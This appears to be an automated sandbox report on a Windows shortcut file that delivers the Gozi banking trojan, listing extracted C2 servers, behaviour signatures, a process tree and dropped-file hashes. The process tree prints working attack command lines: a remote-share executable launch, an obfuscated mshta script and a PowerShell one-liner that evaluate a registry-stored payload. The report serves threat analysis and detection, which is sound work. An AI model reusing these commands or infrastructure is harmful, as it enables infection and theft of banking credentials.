Analysis

  • max time kernel
    151s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-10-2023 13:24

General

  • Target

    Contratto.url

  • Size

    192B

  • MD5

    aa05bdf7862a64f54d6e281944fb0f51

  • SHA1

    60fe537372be17e284f0121f5da307325da6ca92

  • SHA256

    e798fb0280fbc91cbb32234af0c55c4c6e16f528f8282057e334c2055ac07d13

  • SHA512

    e471d9b97fc022e3a769a936f37590da9e3f32e76fb5934ffea91ef8c1fb39f719330cb5299fbb38272bb5b34aac8e28ab05bc2180478eb1bca839911a87a302

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

185.247.184.139

62.72.33.155

incontroler.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs

Processes

  • C:\Windows\System32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Contratto.url
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2616
    • \??\UNC\62.173.146.43\scarica\client.exe
      "\\62.173.146.43\scarica\client.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:2392
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 472
        3⤵
        • Program crash
        PID:1704
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4836
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:4072
      • C:\Windows\System32\RuntimeBroker.exe
        C:\Windows\System32\RuntimeBroker.exe -Embedding
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3780
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3212
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>I0gj='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(I0gj).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\5C68964F-0BE8-EE1D-7550-6F0279841356\\\MaskControl'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1224
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uiqdabx -value gp; new-alias -name ryckknmoi -value iex; ryckknmoi ([System.Text.Encoding]::ASCII.GetString((uiqdabx "HKCU:Software\AppDataLow\Software\Microsoft\5C68964F-0BE8-EE1D-7550-6F0279841356").PlaySystem))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1144
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xpjlltmy\xpjlltmy.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2320
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES407F.tmp" "c:\Users\Admin\AppData\Local\Temp\xpjlltmy\CSC830BADF43BFC4B968584C52E29193C.TMP"
                5⤵
                  PID:3944
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hzbpt33v\hzbpt33v.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1228
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES41D6.tmp" "c:\Users\Admin\AppData\Local\Temp\hzbpt33v\CSC3157D778670E45008B2A9EAA5289EC85.TMP"
                  5⤵
                    PID:2240
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "\\62.173.146.43\scarica\client.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:2384
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:3672
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:2624
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:4772
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2392 -ip 2392
              1⤵
                PID:4604

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\RES407F.tmp
                Filesize

                1KB

                MD5

                06a09193bb46066707b38a637caee269

                SHA1

                155eac12414b40469ab6f0f884f01af840b5654d

                SHA256

                b67ee0609e66584b01606712480be858915e3fc4e48f3f89e8973e6fa1b26719

                SHA512

                4ec98a199e0353c43f50a79a2ce2ab0715d9f09802c99ada3652b69f74fcf325e78bcdf1702b816530ab5505513864f045dd0c0ae3f410d7be1788d67648d5b7

              • C:\Users\Admin\AppData\Local\Temp\RES41D6.tmp
                Filesize

                1KB

                MD5

                e58d3fecdb9dc50f043ca43b105e0473

                SHA1

                2cbcea1a5ef6b98797118830d9e86bbd2afc6169

                SHA256

                5891ce90bbbe6d5587e1f672fc79b3907cd61886b2af25f71188043453cbf932

                SHA512

                89e41103708aac18e47660ae5012ad63b30db9d4ffafc62f156e4ed2bdfe7fa6c12b69ebfa716f2b89cf606228c64d3975d733ce17c5a00853f5e5a7954b6a8d

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w1w3tg3q.jtx.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\hzbpt33v\hzbpt33v.dll
                Filesize

                3KB

                MD5

                b7f90cd9b3ba9e5ed7afc2b716e05d71

                SHA1

                68da6c6c1869e16730de234012caa7886f0aa8db

                SHA256

                6dd8d27f8f952ace97e8f3d5213a2980fac20287665d10b065a0a7a45b708528

                SHA512

                a0078bc347d3062bebcfd8d73a392767a6b3c97bdbe4db9005415b86d9948d9b789b82ef0ae2e1ac520d64e17d79936e897cbff7c9edb506295dc6b31a63ffe2

              • C:\Users\Admin\AppData\Local\Temp\xpjlltmy\xpjlltmy.dll
                Filesize

                3KB

                MD5

                3b3d872b383b48f47f0166009ad35563

                SHA1

                0d7f68f61df87824f2b1c3c99f822f89a568b121

                SHA256

                fc6522bc995810d8dd4da479081a51036aba4bb409619827eb9789979c1351ab

                SHA512

                e999ca6bc4c9a39b2f88814ad180c0181c9628c04952c864a1987c835bec1aef0ab226b13b7a071df7d0f39a14da2ef9ac53349f0cef50bcf4067ec144909baa

              • \??\c:\Users\Admin\AppData\Local\Temp\hzbpt33v\CSC3157D778670E45008B2A9EAA5289EC85.TMP
                Filesize

                652B

                MD5

                0b32642753d1cc58ab3ce99f2e7e0758

                SHA1

                b774a724445f104822382ddcf325d84a91001389

                SHA256

                c448a68c9755afc65317371ca3faa38eae206ca1ec2403f2977f671475e1eb41

                SHA512

                1e877771466bc9cdbbb8889ea3685690bafd80bbf6524913946ab2aecc527dbe552bef695a7cbccff8186a0f012fb84da4ef28053cb4a4221b13937d40297a87

              • \??\c:\Users\Admin\AppData\Local\Temp\hzbpt33v\hzbpt33v.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

              • \??\c:\Users\Admin\AppData\Local\Temp\hzbpt33v\hzbpt33v.cmdline
                Filesize

                369B

                MD5

                9b2f75157c6d61f1daedb608dacf2f49

                SHA1

                066ae2aa4e414b1acb059c0598c13d333eb58719

                SHA256

                5fa6d43c09ab59d8e9d5575828f171f961f204a7f140aaa1a4b7ea73218d44c8

                SHA512

                577555473df079933ff0b9a2e74d1fc765a027185aacc362151089321f08cbb35ea64db6c05b1d5b094e50def55f1ad5faac13c4a8c02370638e26ba29c456ef

              • \??\c:\Users\Admin\AppData\Local\Temp\xpjlltmy\CSC830BADF43BFC4B968584C52E29193C.TMP
                Filesize

                652B

                MD5

                583e85f5c547a4c64df706770da00216

                SHA1

                47a881161f3156676994d5857cd050eb782dcd11

                SHA256

                351c189edcd78267746a406d38e4a90d66b2a292002842a068ee8e55827909b3

                SHA512

                2a6598daba75f7e9a687256a499fa72fffb5516a1ae05d5ac311b67e154b46a142cde1cd83bdb13f316a96723be3802f9221dc4ef236d2a9920f7a3888489b82

              • \??\c:\Users\Admin\AppData\Local\Temp\xpjlltmy\xpjlltmy.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

              • \??\c:\Users\Admin\AppData\Local\Temp\xpjlltmy\xpjlltmy.cmdline
                Filesize

                369B

                MD5

                9222dc42783ff9e9306dd1f40d4bbee3

                SHA1

                305c8c056d23907fc292ece57e464bfd1334dc99

                SHA256

                23a849f75cf775095db9287d21f4b88bc58e0d6eb30caf9bbdc51157b02a3892

                SHA512

                c85524ebcf810debabb6074e8ae5da73b04b0df1b7eb64c08a026b8a986f2d010faa572edf40b1ac8d17d3dd17d10d57a04f34077b69649d94ff73f18279966a

              • memory/1144-54-0x00000246DB6F0000-0x00000246DB72D000-memory.dmp
                Filesize

                244KB

              • memory/1144-24-0x00000246DB450000-0x00000246DB460000-memory.dmp
                Filesize

                64KB

              • memory/1144-23-0x00007FFA28720000-0x00007FFA291E1000-memory.dmp
                Filesize

                10.8MB

              • memory/1144-25-0x00000246DB450000-0x00000246DB460000-memory.dmp
                Filesize

                64KB

              • memory/1144-68-0x00000246DB6F0000-0x00000246DB72D000-memory.dmp
                Filesize

                244KB

              • memory/1144-22-0x00000246DB660000-0x00000246DB682000-memory.dmp
                Filesize

                136KB

              • memory/1144-38-0x00000246DB6C0000-0x00000246DB6C8000-memory.dmp
                Filesize

                32KB

              • memory/1144-67-0x00007FFA28720000-0x00007FFA291E1000-memory.dmp
                Filesize

                10.8MB

              • memory/1144-52-0x00000246DB6E0000-0x00000246DB6E8000-memory.dmp
                Filesize

                32KB

              • memory/2384-118-0x00000181DA9A0000-0x00000181DAA44000-memory.dmp
                Filesize

                656KB

              • memory/2384-99-0x00000181DAA50000-0x00000181DAA51000-memory.dmp
                Filesize

                4KB

              • memory/2384-96-0x00000181DA9A0000-0x00000181DAA44000-memory.dmp
                Filesize

                656KB

              • memory/2392-7-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

              • memory/2392-4-0x0000000002330000-0x000000000233D000-memory.dmp
                Filesize

                52KB

              • memory/2392-8-0x0000000002350000-0x0000000002450000-memory.dmp
                Filesize

                1024KB

              • memory/2392-115-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

              • memory/2392-2-0x0000000002310000-0x000000000231B000-memory.dmp
                Filesize

                44KB

              • memory/2392-9-0x0000000002310000-0x000000000231B000-memory.dmp
                Filesize

                44KB

              • memory/2392-3-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

              • memory/2392-1-0x0000000002350000-0x0000000002450000-memory.dmp
                Filesize

                1024KB

              • memory/2624-98-0x0000000001400000-0x0000000001498000-memory.dmp
                Filesize

                608KB

              • memory/2624-102-0x0000000000FD0000-0x0000000000FD1000-memory.dmp
                Filesize

                4KB

              • memory/2624-106-0x0000000001400000-0x0000000001498000-memory.dmp
                Filesize

                608KB

              • memory/3212-56-0x0000000008960000-0x0000000008A04000-memory.dmp
                Filesize

                656KB

              • memory/3212-97-0x0000000008960000-0x0000000008A04000-memory.dmp
                Filesize

                656KB

              • memory/3212-57-0x00000000028C0000-0x00000000028C1000-memory.dmp
                Filesize

                4KB

              • memory/3672-117-0x0000025C018D0000-0x0000025C01974000-memory.dmp
                Filesize

                656KB

              • memory/3672-111-0x0000025C016A0000-0x0000025C016A1000-memory.dmp
                Filesize

                4KB

              • memory/3672-108-0x0000025C018D0000-0x0000025C01974000-memory.dmp
                Filesize

                656KB

              • memory/3780-70-0x000002DB47430000-0x000002DB474D4000-memory.dmp
                Filesize

                656KB

              • memory/3780-109-0x000002DB47430000-0x000002DB474D4000-memory.dmp
                Filesize

                656KB

              • memory/3780-71-0x000002DB471F0000-0x000002DB471F1000-memory.dmp
                Filesize

                4KB

              • memory/4072-114-0x00000137190D0000-0x0000013719174000-memory.dmp
                Filesize

                656KB

              • memory/4072-78-0x00000137190D0000-0x0000013719174000-memory.dmp
                Filesize

                656KB

              • memory/4072-77-0x0000013719090000-0x0000013719091000-memory.dmp
                Filesize

                4KB

              • memory/4772-88-0x00000288CD130000-0x00000288CD1D4000-memory.dmp
                Filesize

                656KB

              • memory/4772-90-0x00000288CD0E0000-0x00000288CD0E1000-memory.dmp
                Filesize

                4KB

              • memory/4772-119-0x00000288CD130000-0x00000288CD1D4000-memory.dmp
                Filesize

                656KB

              • memory/4836-83-0x0000024F13280000-0x0000024F13324000-memory.dmp
                Filesize

                656KB

              • memory/4836-84-0x0000024F13060000-0x0000024F13061000-memory.dmp
                Filesize

                4KB

              • memory/4836-116-0x0000024F13280000-0x0000024F13324000-memory.dmp
                Filesize

                656KB